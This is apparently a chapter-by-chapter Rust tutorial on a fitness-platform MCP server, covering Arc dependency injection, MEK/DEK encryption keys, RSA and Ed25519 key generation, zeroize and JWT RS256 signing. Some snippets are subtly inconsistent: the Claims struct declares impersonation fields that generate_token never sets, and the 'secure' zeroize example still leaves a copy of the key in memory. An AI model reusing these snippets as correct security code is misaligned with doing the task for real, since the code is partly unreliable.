Rust Idioms Explained:
-
#[derive(Clone)]on struct withArcfields- Cloning
ServerResourcesclones all theArcs (cheap) - Does NOT clone underlying data (Database, AuthManager, etc.)
- Enables passing resources around without lifetime parameters
- Cloning
-
Arc<str>for string secrets- More memory efficient than
Arc<String> - Immutable (strings never change)
- Implements
AsRef<str>for easy access
- More memory efficient than
-
Option<Arc<T>>for optional dependenciesplugin_executormay not be initializedNonemeans feature disabledSome(Arc<...>)when enabled
Creating Serverresources
Source: src/mcp/resources.rs:85-150
#![allow(unused)]
fn main() {
impl ServerResources {
pub fn new(
database: Database,
auth_manager: AuthManager,
admin_jwt_secret: &str,
config: Arc<crate::config::environment::ServerConfig>,
cache: Cache,
rsa_key_size_bits: usize,
jwks_manager: Option<Arc<JwksManager>>,
) -> Self {
// Wrap expensive resources in Arc once
let database_arc = Arc::new(database);
let auth_manager_arc = Arc::new(auth_manager);
// Create dependent resources
let tenant_oauth_client = Arc::new(TenantOAuthClient::new(
TenantOAuthManager::new(Arc::new(config.oauth.clone()))
));
let provider_registry = Arc::new(ProviderRegistry::new());
// Create intelligence engine
let activity_intelligence = Self::create_default_intelligence();
// Create A2A components
let a2a_system_user_service = Arc::new(
A2ASystemUserService::new(database_arc.clone())
);
let a2a_client_manager = Arc::new(A2AClientManager::new(
database_arc.clone(),
a2a_system_user_service.clone(),
));
// Wrap cache
let cache_arc = Arc::new(cache);
// Load or create JWKS manager
let jwks_manager_arc = jwks_manager.unwrap_or_else(|| {
// Load from database or create new
// ... (initialization logic)
Arc::new(new_jwks)
});
Self {
database: database_arc,
auth_manager: auth_manager_arc,
jwks_manager: jwks_manager_arc,
tenant_oauth_client,
provider_registry,
// ... all other fields
}
}
}
}
Pattern observations:
-
Accept owned values (
database: Database)- Not
Arc<Database>in parameters - Caller doesn’t need to know about Arc
new()wraps in Arc internally
- Not
-
Return
Self(notArc<Self>)- Caller decides if they need Arc
- Typical usage:
Arc::new(ServerResources::new(...))
-
.clone()on Arc is explicit- Shows resource sharing happening
- Comments explain why (see line 9 note about “Safe” clones)
Using Serverresources
Source: src/bin/pierre-mcp-server.rs:182-220
#![allow(unused)]
fn main() {
fn create_server(
database: Database,
auth_manager: AuthManager,
jwt_secret: &str,
config: &ServerConfig,
cache: Cache,
) -> MultiTenantMcpServer {
let rsa_key_size = get_rsa_key_size();
// Create resources (wraps everything in Arc)
let mut resources_instance = ServerResources::new(
database,
auth_manager,
jwt_secret,
Arc::new(config.clone()),
cache,
rsa_key_size,
None, // Generate new JWKS
);
// Wrap in Arc for sharing
let resources_arc = Arc::new(resources_instance.clone());
// Initialize plugin system (needs Arc<ServerResources>)
let plugin_executor = PluginToolExecutor::new(resources_arc);
// Set plugin executor back on resources
resources_instance.set_plugin_executor(Arc::new(plugin_executor));
// Final Arc wrapping
let resources = Arc::new(resources_instance);
// Create server with resources
MultiTenantMcpServer::new(resources)
}
}
Pattern: Create → Arc wrap → Share → Modify → Re-wrap
The Service Locator Anti-Pattern
While ServerResources works, it’s a service locator anti-pattern.
Problems with service locator:
- God object - Single struct knows about everything
- Hidden dependencies - Functions take
ServerResourcesbut only use 1-2 fields - Testing complexity - Must mock entire
ServerResourceseven for simple tests - Tight coupling - Adding new dependency requires changing one big struct
- Unclear requirements - Can’t tell from signature what function needs
Example of the problem:
#![allow(unused)]
fn main() {
// What does this function actually need?
async fn process_activity(
resources: &ServerResources,
activity_id: &str,
) -> Result<ProcessedActivity> {
// Uses only database and intelligence
let activity = resources.database.get_activity(activity_id).await?;
let analysis = resources.activity_intelligence.analyze(&activity)?;
Ok(analysis)
}
// Better: explicit dependencies
async fn process_activity(
database: &Database,
intelligence: &ActivityIntelligence,
activity_id: &str,
) -> Result<ProcessedActivity> {
// Clear what's needed!
let activity = database.get_activity(activity_id).await?;
let analysis = intelligence.analyze(&activity)?;
Ok(analysis)
}
}
Reference: Service Locator Anti-Pattern
Solution 2: Focused Context Pattern
Pierre is evolving toward focused contexts that group related dependencies.
Source: src/context/mod.rs:1-40
#![allow(unused)]
fn main() {
//! Focused dependency injection contexts
//!
//! This module replaces the `ServerResources` service locator anti-pattern with
//! focused contexts that provide only the dependencies needed for specific operations.
//!
//! # Architecture
//!
//! - `AuthContext`: Authentication and authorization dependencies
//! - `DataContext`: Database and data provider dependencies
//! - `ConfigContext`: Configuration and OAuth management dependencies
//! - `NotificationContext`: WebSocket and SSE notification dependencies
/// Authentication context
pub mod auth;
/// Configuration context
pub mod config;
/// Data context
pub mod data;
/// Notification context
pub mod notification;
/// Server context combining all focused contexts
pub mod server;
// Re-exports
pub use auth::AuthContext;
pub use config::ConfigContext;
pub use data::DataContext;
pub use notification::NotificationContext;
pub use server::ServerContext;
}
Focused Context Example
#![allow(unused)]
fn main() {
// Conceptual example of focused contexts
/// Context for authentication operations
#[derive(Clone)]
pub struct AuthContext {
pub auth_manager: Arc<AuthManager>,
pub jwks_manager: Arc<JwksManager>,
pub middleware: Arc<McpAuthMiddleware>,
}
/// Context for data operations
#[derive(Clone)]
pub struct DataContext {
pub database: Arc<Database>,
pub provider_registry: Arc<ProviderRegistry>,
pub cache: Arc<Cache>,
}
/// Context for configuration operations
#[derive(Clone)]
pub struct ConfigContext {
pub config: Arc<ServerConfig>,
pub tenant_oauth_client: Arc<TenantOAuthClient>,
}
// Use specific contexts
async fn authenticate_user(
auth_ctx: &AuthContext,
token: &str,
) -> Result<User> {
// Only has access to auth-related dependencies
auth_ctx.auth_manager.validate_token(token)
}
async fn fetch_activities(
data_ctx: &DataContext,
user_id: &str,
) -> Result<Vec<Activity>> {
// Only has access to data-related dependencies
data_ctx.database.get_activities(user_id).await
}
}
Benefits:
- ✅ Clear dependencies - Function signature shows what it needs
- ✅ Easier testing - Mock only relevant context
- ✅ Better organization - Related dependencies grouped
- ✅ Loose coupling - Changes to one context don’t affect others
- ✅ Type safety - Compiler prevents using wrong context
Arc<T> vs Rc<T> vs Box<T>
Understanding when to use each smart pointer:
| Type | Thread-Safe? | Overhead | Use When |
|---|---|---|---|
Box<T> | N/A | Single allocation | Single ownership, heap allocation |
Rc<T> | ❌ No | Non-atomic counter | Shared ownership, single thread |
Arc<T> | ✅ Yes | Atomic counter | Shared ownership, multi-threaded |
Pierre uses Arc<T> because:
- Axum handlers run on different threads
- Need to share resources across concurrent requests
- Thread safety is non-negotiable in async runtime
When to use each:
#![allow(unused)]
fn main() {
// Box<T> - Single ownership
let config = Box::new(Config::from_file("config.toml")?);
drop(config); // Config is dropped
// Rc<T> - Shared ownership, single thread
use std::rc::Rc;
let data = Rc::new(vec![1, 2, 3]);
let data2 = Rc::clone(&data);
// Both point to same Vec, single-threaded only
// Arc<T> - Shared ownership, multi-threaded
use std::sync::Arc;
let database = Arc::new(Database::new()?);
tokio::spawn(async move {
database.query(...).await // Can use in another thread
});
}
Reference: Rust Book - Smart Pointers
Interior Mutability with Arc<Mutex<T>>
Arc provides shared ownership, but data is immutable. For mutable shared state, use Mutex.
#![allow(unused)]
fn main() {
use std::sync::{Arc, Mutex};
// Shared mutable counter
let counter = Arc::new(Mutex::new(0));
// Spawn multiple tasks that increment counter
for _ in 0..10 {
let counter_clone = Arc::clone(&counter);
tokio::spawn(async move {
let mut num = counter_clone.lock().unwrap(); // Acquire lock
*num += 1;
}); // Lock automatically released when `num` is dropped
}
}
Rust Idioms Explained:
-
Arc<Mutex<T>>patternArcfor shared ownershipMutexfor exclusive access- Common pattern for shared mutable state
-
.lock()returnsMutexGuard- RAII guard that unlocks on drop
- Implements
DerefandDerefMut - Access inner value with
*guard
-
When to use:
- ✅ Occasional writes (metrics, caches)
- ❌ Frequent writes (use channels/actors instead)
- ❌ Async code (use
tokio::sync::Mutexinstead)
Pierre examples:
WebSocketManagerusesDashMap(concurrent HashMap)CacheusesMutexfor LRU eviction- Most resources are immutable after creation
Reference: Rust Book - Mutex
Diagram: Dependency Injection Flow
┌──────────────────────────────────────────────────────────┐
│ Application Startup │
└──────────────────────────────────────────────────────────┘
│
▼
┌─────────────────────────────────────┐
│ Create Expensive Resources Once │
│ - Database (connection pool) │
│ - AuthManager (key material) │
│ - JwksManager (RSA keys) │
│ - Cache (LRU storage) │
└─────────────────┬───────────────────┘
│
▼
┌─────────────────────────────────────┐
│ Wrap in Arc<T> │
│ - Arc::new(database) │
│ - Arc::new(auth_manager) │
│ - Arc::new(jwks_manager) │
└─────────────────┬───────────────────┘
│
▼
┌─────────────────────────────────────┐
│ Create ServerResources │
│ (or focused contexts) │
└─────────────────┬───────────────────┘
│
▼
┌─────────────────────────────────────┐
│ Wrap ServerResources in Arc │
│ Arc::new(resources) │
└─────────────────┬───────────────────┘
│
┌─────────────────┼─────────────────┐
│ │ │
▼ ▼ ▼
┌──────────┐ ┌──────────┐ ┌──────────┐
│Handler 1 │ │Handler 2 │ │Handler N │
│resources │ │resources │ │resources │
│.clone() │ │.clone() │ │.clone() │
└────┬─────┘ └────┬─────┘ └────┬─────┘
│ │ │
└────────────────┼────────────────┘
│
▼
┌──────────────────────────────────┐
│ All point to same resources │
│ (Arc counter = N) │
│ Memory allocated once │
└──────────────────────────────────┘
Rust Idioms Summary
| Idiom | Purpose | Example Location |
|---|---|---|
Arc<T> | Shared ownership across threads | src/mcp/resources.rs:40-77 |
Arc::clone() | Increment reference count | src/mcp/resources.rs:98-113 |
#[derive(Clone)] on Arc struct | Cheap struct cloning | src/mcp/resources.rs:39 |
Arc<str> | Efficient immutable string sharing | src/mcp/resources.rs:58 |
Option<Arc<T>> | Optional shared dependencies | src/mcp/resources.rs:72 |
| Focused contexts | Domain-specific DI containers | src/context/mod.rs |
References:
Key Takeaways
- Arc
enables shared ownership - Thread-safe reference counting - Cloning Arc is cheap - Just increments atomic counter
- Create once, share everywhere - Wrap expensive resources in Arc at startup
- Service locator is an anti-pattern - Use focused contexts instead
- Explicit dependencies - Function signatures should show what’s needed
- Arc vs Rc vs Box - Choose based on threading and ownership needs
- Interior mutability - Use
MutexorRwLockfor mutable shared state
Next Chapter
Chapter 5: Cryptographic Key Management - Learn Pierre’s two-tier key management system (MEK + DEK), RSA key generation for JWT signing, and the zeroize crate for secure memory cleanup.
Chapter 5: Cryptographic Key Management
Introduction
Cryptography in production requires careful key management. Pierre implements a two-tier key system:
- MEK (Master Encryption Key) - Tier 1, from environment
- DEK (Database Encryption Key) - Tier 2, encrypted with MEK
Plus RSA key pairs for JWT RS256 signing and Ed25519 for A2A authentication.
This chapter teaches secure key generation, storage, and the Rust patterns that prevent key leakage.
Two-Tier Key Management System
Architecture Overview
┌─────────────────────────────────────────────────────────┐
│ Two-Tier Key Management │
└─────────────────────────────────────────────────────────┘
Tier 1: MEK (Master Encryption Key)
├─ Source: PIERRE_MASTER_ENCRYPTION_KEY environment variable
├─ Size: 32 bytes (256 bits)
├─ Usage: Encrypts DEK before storage
└─ Lifetime: Never stored in database
↓ Encrypts
Tier 2: DEK (Database Encryption Key)
├─ Source: Generated randomly, stored encrypted
├─ Size: 32 bytes (256 bits)
├─ Usage: Encrypts sensitive database fields (tokens, secrets)
└─ Storage: Database, encrypted with MEK
↓ Encrypts
User Data
├─ OAuth tokens
├─ API keys
└─ Sensitive user information
Why two tiers?
- MEK rotation doesn’t require re-encrypting all data
- DEK can be rotated independently
- Separation of concerns: MEK from ops, DEK from code
- Key hierarchy: Industry standard (AWS KMS, GCP KMS use similar)
Reference: AWS KMS Concepts
Master Encryption Key MEK
Source: src/key_management.rs:14-188
MEK Structure
#![allow(unused)]
fn main() {
/// Master Encryption Key (MEK) - Tier 1
pub struct MasterEncryptionKey {
key: [u8; 32], // Fixed-size array (256 bits)
}
}
Rust Idioms Explained:
-
Fixed-size array
[u8; 32]- Exactly 32 bytes, known at compile time
- Stack-allocated (no heap)
- Implements
Copy(cheap to pass around) - More secure than
Vec<u8>(can’t be resized accidentally)
-
Private field -
keyis private- Can’t access directly from outside module
- Forces use of safe accessor methods
- Prevents accidental copying
Loading MEK from Environment
Source: src/key_management.rs:45-85
Important: The MEK is required in all environments. There is no auto-generation fallback. This ensures encrypted data remains accessible across server restarts.
#![allow(unused)]
fn main() {
impl MasterEncryptionKey {
/// Load MEK from environment variable (required)
///
/// # Errors
///
/// Returns an error if:
/// - The `PIERRE_MASTER_ENCRYPTION_KEY` environment variable is not set
/// - The environment variable contains invalid base64 encoding
/// - The decoded key is not exactly 32 bytes
pub fn load_or_generate() -> AppResult<Self> {
env::var("PIERRE_MASTER_ENCRYPTION_KEY").map_or_else(
|_| {
Err(AppError::config(
"PIERRE_MASTER_ENCRYPTION_KEY environment variable is required.\n\n\
This key is used to encrypt sensitive data (OAuth tokens, admin secrets, etc.).\n\
Without a persistent key, encrypted data becomes unreadable after server restart.\n\n\
To generate a key, run:\n\
\x20\x20openssl rand -base64 32\n\n\
Then set it in your environment:\n\
\x20\x20export PIERRE_MASTER_ENCRYPTION_KEY=\"<your-generated-key>\"\n\n\
Or add it to your .env file.",
))
},
|encoded_key| Self::load_from_environment(&encoded_key),
)
}
fn load_from_environment(encoded_key: &str) -> AppResult<Self> {
info!("Loading Master Encryption Key from environment variable");
let key_bytes = Base64Standard.decode(encoded_key).map_err(|e| {
AppError::config(format!(
"Invalid base64 encoding in PIERRE_MASTER_ENCRYPTION_KEY: {e}"
))
})?;
if key_bytes.len() != 32 {
return Err(AppError::config(format!(
"Master encryption key must be exactly 32 bytes, got {} bytes",
key_bytes.len()
)));
}
let mut key = [0u8; 32];
key.copy_from_slice(&key_bytes);
Ok(Self { key })
}
}
}
Rust Idioms Explained:
-
.copy_from_slice()method- Copies
Vec<u8>into[u8; 32] - Panics if lengths don’t match (we validate first)
- More efficient than looping
- Copies
-
Early return pattern
if let Ok(...) { return ... }- Avoids deep nesting
- Clear error handling path
-
Error context with
.map_err()- Wraps underlying error with helpful message
- User sees “Invalid base64” not “DecodeError”
MEK encryption/decryption
Source: src/key_management.rs:130-187
#![allow(unused)]
fn main() {
impl MasterEncryptionKey {
/// Encrypt data with the MEK (used to encrypt DEK)
pub fn encrypt(&self, plaintext: &[u8]) -> Result<Vec<u8>> {
use aes_gcm::{aead::Aead, Aes256Gcm, KeyInit, Nonce};
use rand::RngCore;
// Create AES-GCM cipher
let cipher = Aes256Gcm::new_from_slice(&self.key)
.map_err(|e| AppError::internal(format!("Invalid key length: {e}")))?;
// Generate random nonce (12 bytes for AES-GCM)
let mut nonce_bytes = [0u8; 12];
rand::thread_rng().fill_bytes(&mut nonce_bytes);
let nonce = Nonce::from_slice(&nonce_bytes);
// Encrypt the data
let ciphertext = cipher
.encrypt(nonce, plaintext)
.map_err(|e| AppError::internal(format!("Encryption failed: {e}")))?;
// Prepend nonce to ciphertext (needed for decryption)
let mut result = Vec::with_capacity(12 + ciphertext.len());
result.extend_from_slice(&nonce_bytes);
result.extend_from_slice(&ciphertext);
Ok(result)
}
pub fn decrypt(&self, encrypted_data: &[u8]) -> Result<Vec<u8>> {
use aes_gcm::{aead::Aead, Aes256Gcm, KeyInit, Nonce};
if encrypted_data.len() < 12 {
return Err(AppError::invalid_input("Encrypted data too short").into());
}
let cipher = Aes256Gcm::new_from_slice(&self.key)
.map_err(|e| AppError::internal(format!("Invalid key length: {e}")))?;
// Extract nonce and ciphertext
let nonce = Nonce::from_slice(&encrypted_data[..12]);
let ciphertext = &encrypted_data[12..];
// Decrypt the data
let plaintext = cipher
.decrypt(nonce, ciphertext)
.map_err(|e| AppError::internal(format!("Decryption failed: {e}")))?;
Ok(plaintext)
}
}
}
Cryptography Explained:
-
AES-256-GCM - Authenticated encryption
- AES-256: Symmetric encryption (256-bit key)
- GCM: Galois/Counter Mode (authenticated, prevents tampering)
- Industry standard (used by TLS, IPsec, etc.)
-
Nonce (Number Once)
- 12 bytes random value
- Must be unique for each encryption
- Stored alongside ciphertext
- Prevents identical plaintexts producing same ciphertext
-
Prepending nonce to ciphertext
- Common pattern:
[nonce || ciphertext] - Decryption extracts first 12 bytes
- Alternative: separate storage (more complex)
- Common pattern:
Reference: NIST AES-GCM Spec
MEK Setup for Development
Unlike some systems that auto-generate keys for development convenience, Pierre requires the MEK to be set explicitly. This is intentional—it prevents the common mistake of deploying to production without a persistent key.
Generating a MEK:
# Generate a cryptographically secure 32-byte key
openssl rand -base64 32
# Example output: K7xL9mP2qR4vT6yZ8aB0cD2eF4gH6iJ8kL0mN2oP4qR=
Setting the MEK:
# Option 1: Environment variable
export PIERRE_MASTER_ENCRYPTION_KEY="K7xL9mP2qR4vT6yZ8aB0cD2eF4gH6iJ8kL0mN2oP4qR="
# Option 2: .env file (recommended for development)
echo 'PIERRE_MASTER_ENCRYPTION_KEY="K7xL9mP2qR4vT6yZ8aB0cD2eF4gH6iJ8kL0mN2oP4qR="' >> .env
Why No Auto-Generation?
| Approach | Problem |
|---|---|
| Auto-generate MEK | Data becomes unreadable after restart (encrypted tokens, secrets lost) |
| In-memory only | Same as above—no persistence across restarts |
| Store generated key | Security risk—key in logs, filesystem |
Pierre’s approach ensures:
- Explicit configuration - You must consciously set the key
- Persistence - The same key works across restarts
- No secrets in logs - MEK is never logged or displayed
- Clear errors - Helpful message if MEK is missing
Error When MEK Not Set:
Error: PIERRE_MASTER_ENCRYPTION_KEY environment variable is required.
This key is used to encrypt sensitive data (OAuth tokens, admin secrets, etc.).
Without a persistent key, encrypted data becomes unreadable after server restart.
To generate a key, run:
openssl rand -base64 32
Then set it in your environment:
export PIERRE_MASTER_ENCRYPTION_KEY="<your-generated-key>"
Or add it to your .env file.
RSA Keys for JWT Signing
Pierre uses RS256 (RSA with SHA-256) for JWT signing, requiring RSA key pairs.
Source: src/admin/jwks.rs:87-133
RSA Key Pair Structure
#![allow(unused)]
fn main() {
/// RSA key pair with metadata
#[derive(Clone)]
pub struct RsaKeyPair {
/// Unique key identifier
pub kid: String,
/// Private key for signing
pub private_key: RsaPrivateKey,
/// Public key for verification
pub public_key: RsaPublicKey,
/// Key creation timestamp
pub created_at: DateTime<Utc>,
/// Whether this is the currently active signing key
pub is_active: bool,
}
}
Fields explained:
kid(Key ID): Identifies key in JWKS (e.g., “key_2025_01”)private_key: Used to sign JWTs (kept secret)public_key: Distributed via JWKS (anyone can verify)is_active: Only one active key at a time
Generating RSA Keys
Source: src/admin/jwks.rs:103-133
#![allow(unused)]
fn main() {
impl RsaKeyPair {
/// Generate RSA key pair with configurable key size
pub fn generate_with_key_size(kid: &str, key_size_bits: usize) -> Result<Self> {
use rand::rngs::OsRng;
let mut rng = OsRng; // Cryptographically secure RNG
let private_key = RsaPrivateKey::new(&mut rng, key_size_bits)
.map_err(|e| AppError::internal(
format!("Failed to generate RSA private key: {e}")
))?;
let public_key = RsaPublicKey::from(&private_key);
Ok(Self {
kid: kid.to_owned(),
private_key,
public_key,
created_at: Utc::now(),
is_active: true,
})
}
}
}
Rust Idioms Explained:
-
OsRng- Operating system RNG- Cryptographically secure random number generator
- Uses OS entropy source (Linux:
/dev/urandom, Windows: BCrypt) - Never use
rand::thread_rng()for cryptographic keys
-
RsaPublicKey::from(&private_key)- Public key is mathematically derived from private key
- No randomness needed
- Implements
Fromtrait
-
Key sizes:
- 2048 bits: Minimum, fast generation (~250ms)
- 4096 bits: Recommended, slow generation (~10s)
- Pierre uses 4096 in production, 2048 in tests
Reference: RSA Key Sizes
JWKS JSON Web Key Set)
Source: src/admin/jwks.rs:62-85
#![allow(unused)]
fn main() {
/// JWK (JSON Web Key) representation
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct JsonWebKey {
/// Key type (always "RSA" for RS256)
pub kty: String,
/// Public key use (always "sig" for signature)
#[serde(rename = "use")]
pub key_use: String,
/// Key ID for rotation tracking
pub kid: String,
/// Algorithm (RS256)
pub alg: String,
/// RSA modulus (base64url encoded)
pub n: String,
/// RSA exponent (base64url encoded)
pub e: String,
}
/// JWKS (JSON Web Key Set) container
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct JsonWebKeySet {
pub keys: Vec<JsonWebKey>,
}
}
JWKS format example:
{
"keys": [
{
"kty": "RSA",
"use": "sig",
"kid": "key_2025_01",
"alg": "RS256",
"n": "xGOr-H...(base64url)...",
"e": "AQAB"
}
]
}
Fields explained:
kty: Key type (RSA, EC, oct)use: Key usage (sig=signature, enc=encryption)kid: Key identifier (for rotation)alg: Algorithm (RS256, ES256, etc.)n: RSA modulus (public)e: RSA exponent (usually 65537 = “AQAB” in base64url)
Reference: RFC 7517 - JSON Web Key
Converting to Jwk Format
Source: src/admin/jwks.rs:135-162
#![allow(unused)]
fn main() {
impl RsaKeyPair {
pub fn to_jwk(&self) -> Result<JsonWebKey> {
use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine};
use rsa::traits::PublicKeyParts;
// Extract RSA components
let n = self.public_key.n(); // Modulus (BigUint)
let e = self.public_key.e(); // Exponent (BigUint)
// Convert to big-endian bytes
let n_bytes = n.to_bytes_be();
let e_bytes = e.to_bytes_be();
// Encode as base64url (no padding)
let n_b64 = URL_SAFE_NO_PAD.encode(&n_bytes);
let e_b64 = URL_SAFE_NO_PAD.encode(&e_bytes);
Ok(JsonWebKey {
kty: "RSA".to_owned(),
key_use: "sig".to_owned(),
kid: self.kid.clone(),
alg: "RS256".to_owned(),
n: n_b64,
e: e_b64,
})
}
}
}
Cryptography Explained:
-
BigUint to bytes
- RSA components are very large integers
.to_bytes_be()= big-endian byte representation- Standard format for JWK
-
Base64url encoding
- URL-safe variant (replaces
+/with-_) - No padding (
=) for cleaner URLs - Standard for JWT/JWKS
- URL-safe variant (replaces
Ed25519 for A2A Authentication
A2A protocol uses Ed25519 (elliptic curve) for faster, smaller signatures.
Source: src/crypto/keys.rs:16-66
Ed25519 Key Generation
#![allow(unused)]
fn main() {
/// Ed25519 keypair for A2A client authentication
#[derive(Debug, Clone)]
pub struct A2AKeypair {
pub public_key: String, // Base64 encoded
pub private_key: String, // Base64 encoded
}
impl A2AKeyManager {
pub fn generate_keypair() -> Result<A2AKeypair> {
use rand::RngCore;
let mut rng = OsRng;
let mut secret_bytes = [0u8; 32];
rng.fill_bytes(&mut secret_bytes);
let signing_key = SigningKey::from_bytes(&secret_bytes);
// Security: Zeroize secret bytes to prevent memory exposure
secret_bytes.zeroize();
let verifying_key = signing_key.verifying_key();
let public_key = general_purpose::STANDARD.encode(verifying_key.as_bytes());
let private_key = general_purpose::STANDARD.encode(signing_key.as_bytes());
Ok(A2AKeypair { public_key, private_key })
}
}
}
Ed25519 vs RSA:
| Feature | Ed25519 | RSA-4096 |
|---|---|---|
| Key size | 32 bytes | 512 bytes |
| Signature size | 64 bytes | 512 bytes |
| Generation speed | Fast (~1ms) | Slow (~10s) |
| Verification speed | Fast | Slower |
| Use case | Modern systems | Legacy compatibility |
Why Pierre uses both?:
- RS256 (RSA): JWT standard, widely supported
- Ed25519: A2A only, modern, efficient
Reference: Ed25519 Paper
Zeroize: Secure Memory Cleanup
The zeroize crate prevents key material from lingering in memory.
Source: src/crypto/keys.rs:54
The Memory Leak Problem
#![allow(unused)]
fn main() {
// WITHOUT zeroize - INSECURE
fn generate_key() -> [u8; 32] {
let mut key = [0u8; 32];
rng.fill_bytes(&mut key);
key
// key bytes still in memory!
// Could be swapped to disk, dumped in crash, etc.
}
// WITH zeroize - SECURE
fn generate_key() -> [u8; 32] {
let mut secret_bytes = [0u8; 32];
rng.fill_bytes(&mut secret_bytes);
let key = secret_bytes; // Copy to return value
secret_bytes.zeroize(); // Overwrite with zeros
key
}
}
Zeroize Usage
Source: src/crypto/keys.rs:45-55
#![allow(unused)]
fn main() {
use zeroize::Zeroize;
let mut secret_bytes = [0u8; 32];
rng.fill_bytes(&mut secret_bytes);
let signing_key = SigningKey::from_bytes(&secret_bytes);
// Overwrite secret_bytes with zeros
secret_bytes.zeroize(); // ← Critical security step
// secret_bytes memory now contains all zeros
// Prevents recovery via memory dumps
}
Rust Idioms Explained:
-
.zeroize()method- Overwrites memory with zeros
- Compiler can’t optimize away (volatile write)
- Safe even if code panics (Drop implementation)
-
Zeroizetrait- Implemented for arrays, Vecs, Strings
- Can derive:
#[derive(Zeroize)] - Automatic on drop with
ZeroizeOnDrop
Example with automatic zeroize:
#![allow(unused)]
fn main() {
use zeroize::{Zeroize, ZeroizeOnDrop};
#[derive(Zeroize, ZeroizeOnDrop)]
struct SecretKey {
key: [u8; 32],
}
fn use_key() {
let secret = SecretKey { key: [1; 32] };
// Use secret...
} // ← Automatically zeroized on drop!
}
Reference: zeroize crate docs
Key Takeaways
- Two-tier keys: MEK from environment, DEK from database
- AES-256-GCM: Authenticated encryption with nonces
- RSA for JWT: 4096-bit keys for production security
- Ed25519 for A2A: Smaller, faster elliptic curve signatures
- OsRng for crypto: Never use weak RNGs for keys
- zeroize for cleanup: Prevent key leakage in memory
- Conditional compilation:
#[cfg(debug_assertions)]for safe logging
Next Chapter
Chapter 6: JWT Authentication with RS256 - Learn JWT token generation, validation, claims-based authorization, and the jsonwebtoken crate.
Chapter 06: JWT Authentication with RS256
This chapter explores JWT (JSON Web Token) authentication using RS256 asymmetric signing in the Pierre Fitness Platform. You’ll learn how the platform implements secure token generation, validation, and session management using RSA key pairs from the JWKS system covered in Chapter 5.
JWT Structure and Claims
JWT tokens consist of three base64-encoded parts separated by dots: header.payload.signature. The Pierre platform uses RS256 (RSA Signature with SHA-256) for asymmetric signing, allowing token verification without sharing the private key.
Standard JWT Claims
The platform follows RFC 7519 for standard JWT claims:
Source: src/auth.rs:125-153
#![allow(unused)]
fn main() {
/// JWT claims for user authentication
#[derive(Debug, Serialize, Deserialize)]
pub struct Claims {
/// User ID
pub sub: String,
/// User email
pub email: String,
/// Issued at timestamp (seconds since Unix epoch)
pub iat: i64,
/// Expiration timestamp
pub exp: i64,
/// Issuer (who issued the token)
pub iss: String,
/// JWT ID (unique identifier for this token)
pub jti: String,
/// Available fitness providers
pub providers: Vec<String>,
/// Audience (who the token is intended for)
pub aud: String,
/// Tenant ID (optional for backward compatibility with existing tokens)
#[serde(skip_serializing_if = "Option::is_none")]
pub tenant_id: Option<String>,
/// Original user ID when impersonating (the super admin)
#[serde(skip_serializing_if = "Option::is_none")]
pub impersonator_id: Option<String>,
/// Impersonation session ID for audit trail
#[serde(skip_serializing_if = "Option::is_none")]
pub impersonation_session_id: Option<String>,
}
}
Each claim serves a specific purpose:
sub(Subject): Unique user identifier (UUID)iss(Issuer): Service that created the token (“pierre-mcp-server”)aud(Audience): Intended recipient of the token (“mcp” or “admin-api”)exp(Expiration): Unix timestamp when token becomes invalidiat(Issued At): Unix timestamp when token was createdjti(JWT ID): Unique token identifier (prevents replay attacks)
Custom Claims for Multi-Tenancy
The platform extends standard claims with domain-specific fields:
email: User’s email address for quick lookupsproviders: List of connected fitness providers (Garmin, Strava, etc.)tenant_id: Multi-tenant isolation identifier (optional for backward compatibility)
Rust Idiom: #[serde(skip_serializing_if = "Option::is_none")]
This attribute prevents including null values in the JSON payload, reducing token size. The Option<String> type provides compile-time safety for optional fields while maintaining backward compatibility with tokens that don’t include tenant_id.
RS256 vs HS256 Asymmetric Signing
The platform uses RS256 (RSA Signature with SHA-256) instead of HS256 (HMAC with SHA-256) for several security advantages:
HS256 Symmetric Signing (not Used)
┌─────────────┐ ┌─────────────┐
│ Server │ │ Client │
│ │ │ │
│ Secret Key │◄──────shared───────┤ Secret Key │
│ │ │ │
│ Sign Token │────────────────────►│ Verify Token│
└─────────────┘ └─────────────┘
Problem: The same secret key signs AND verifies tokens. If clients need to verify tokens, they must have the private key, which defeats the purpose of asymmetric cryptography.
RS256 Asymmetric Signing (used by Pierre)
┌─────────────────┐ ┌─────────────────┐
│ Server │ │ Client │
│ │ │ │
│ Private Key │ │ Public Key │
│ (JWKS secret) │ │ (JWKS public) │
│ │ │ │
│ Sign Token ────►│────token──────►│ Verify Token │
│ │ │ │
│ Rotate Keys │◄───GET /jwks◄──┤ Fetch Public │
└─────────────────┘ └─────────────────┘
Advantage: The server holds the private key (MEK-encrypted in the database). Clients download only public keys from /.well-known/jwks.json endpoint. Even if a client is compromised, attackers cannot forge tokens.
Source: src/auth.rs:232-243
#![allow(unused)]
fn main() {
// Get active RSA key from JWKS manager
let active_key = jwks_manager.get_active_key()?;
let encoding_key = active_key.encoding_key()?;
// Create RS256 header with kid
let mut header = Header::new(Algorithm::RS256);
header.kid = Some(active_key.kid.clone());
let token = encode(&header, &claims, &encoding_key)?;
}
The kid (Key ID) in the header allows the platform to rotate RSA keys without invalidating existing tokens. When validating a token, the platform looks up the corresponding public key by kid.
Token Generation with JWKS Integration
Token generation involves creating claims, selecting the active RSA key, and signing with the private key.
User Authentication Tokens
The AuthManager generates tokens for authenticated users after successful login:
Source: src/auth.rs:212-243
#![allow(unused)]
fn main() {
/// Generate a JWT token for a user with RS256 asymmetric signing
///
/// # Errors
///
/// Returns an error if:
/// - JWT encoding fails due to invalid claims
/// - System time is unavailable for timestamp generation
/// - JWKS manager has no active key
pub fn generate_token(
&self,
user: &User,
jwks_manager: &crate::admin::jwks::JwksManager,
) -> Result<String> {
let now = Utc::now();
let expiry = now + Duration::hours(self.token_expiry_hours);
let claims = Claims {
sub: user.id.to_string(),
email: user.email.clone(),
iat: now.timestamp(),
exp: expiry.timestamp(),
iss: crate::constants::service_names::PIERRE_MCP_SERVER.to_owned(),
jti: Uuid::new_v4().to_string(),
providers: user.available_providers(),
aud: crate::constants::service_names::MCP.to_owned(),
tenant_id: user.tenant_id.clone(),
};
// Get active RSA key from JWKS manager
let active_key = jwks_manager.get_active_key()?;
let encoding_key = active_key.encoding_key()?;
// Create RS256 header with kid
let mut header = Header::new(Algorithm::RS256);
header.kid = Some(active_key.kid.clone());
let token = encode(&header, &claims, &encoding_key)?;
Ok(token)
}
}
Rust Idiom: Uuid::new_v4().to_string()
